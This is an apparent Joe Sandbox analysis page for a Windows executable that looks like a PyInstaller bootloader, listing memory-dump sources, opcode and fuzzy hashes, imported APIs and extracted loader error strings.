                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                              • Instruction ID: 8e1d96951b261ff9eb1306e4a9522c60d1d91cd03db06203923b6e833e419e01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E516E77A1CA6186E7248F2DD04063937A1EB44B69F244171CB9D97BB4DF3AE853C780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                              • Instruction ID: b138f6bc8c52181844144a55229968c6f48ec0f2f32b9e065b88623ed96110ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6514B37B1C66986E7248F2DC44463827A1EB44B99F254131DF4D97BA9CF3AE943C780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                              • Instruction ID: 9307ee65e2be1d8290b0f11c641d0d9c49b274adfb5692bd97dc222d05d6deb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7514B37A1C67586EB248F2DD04422827A1EB45B59F288171CF4D97FA9CF3AEC42C780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                              • Instruction ID: e9fd62b0811e99b0ec754811abe9e054540589ed1055f077bfb323abdf37eebf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64514C77A2CA6186E7648F2DD04032827A1EB45B5AF249171DB4D97BA4DF3AEC82C740
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction ID: f68509b52574d0eee6db8f0e0fb182b962567b6c6a8a107848a9e0d0c2a8d926
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9418363C0D76A05E9E98F1C45086B426809F127A2F5897B8DFAD97BE3CD3D7696C300
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                              • Instruction ID: 00b264eea01942eb10c0a86702d5511ee60d723e42bc5f3da9e883a24b026d2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441E473718A5586EF04CF2ADA14669A3A1BB48FD0B499036EF0DDBB64DE3DD4428700
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
APIs
  • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF6B75086B7,?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B750822C
  • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction ID: 5366563b7c7873b22ac9c7ec1e089b531d78b2e5d599c86f239c1fcb5f5fc67b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B219223B0CA4282EB458B7EE8545B96361FF88B94F584235DB6DC33F4EE2CE5918341
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction ID: c4733eaa1329521d65f513c589a98c92650a635fbfeec5a90d75ea550f6378d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A128163E0C2A386FB205F18D1546B976A1FB50752F888135E78B86EE4DF3CE980CB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction ID: ac11f2da6b373fe71ff394aa5867e5bdf766a2b15bf0cee618d3e2b85ee76662
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB129463E0C5A386FB205F1CE05467976A5FB40756F954071D79A86EE8DF7CE980CB00
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 9e6d356331cceb36e06eccad6adf1a3c001823f33e5e99eafa3b8aac7d5c78d7
                                                                                                                                                                                                                                              • Instruction ID: d15e8edc4f45c5f271024c7f72dfc8627a41669d215db790b53297602b771fef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d356331cceb36e06eccad6adf1a3c001823f33e5e99eafa3b8aac7d5c78d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6419063B0C65282FA14DB1AA8006B963A1FF44BC8F944432EF4D877A6DE3CF542C781
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                              • Opcode ID: 1f9944f3975ec637b67728bc3c41dfd727d4deabf5f38a4d76f85a3f7c038b2f
                                                                                                                                                                                                                                              • Instruction ID: 45ed98669c2f5c538919f4ea6eed95d4527243c82f7e3c2e27c677da55cbe8a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f9944f3975ec637b67728bc3c41dfd727d4deabf5f38a4d76f85a3f7c038b2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D418023A0C65286EB10DF2994415B963A0FF44798F444936EF4D8BBB5EE3CE542CB01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction ID: 0f6f161b265eec980ae33d0b35f7936975ffc0c3fa9cf963a21a6fa9547c57f1
• Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction Fuzzy Hash: 8FD16C73A0CB458AEB60AB6994403AD77A0FB4578CF240139EF4D97BA6DF38E591C700

APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
• MessageBoxW.USER32 ref: 00007FF6B7502D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
• Instruction ID: f34275d7c7839644d7230baefb48d72bfd76ee537afc4b6542ef25829316cf4b
• Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
• Instruction Fuzzy Hash: FD31D827B0CA4542E6219B29B8102AB67A1BF88798F410136EF4DD7779EF3CD646C700

APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD4D
• GetLastError.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD5B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DD85
• FreeLibrary.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDF3
• GetProcAddress.KERNEL32(?,?,?,00007FF6B750DF7A,?,?,?,00007FF6B750DC6C,?,?,?,00007FF6B750D869), ref: 00007FF6B750DDFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
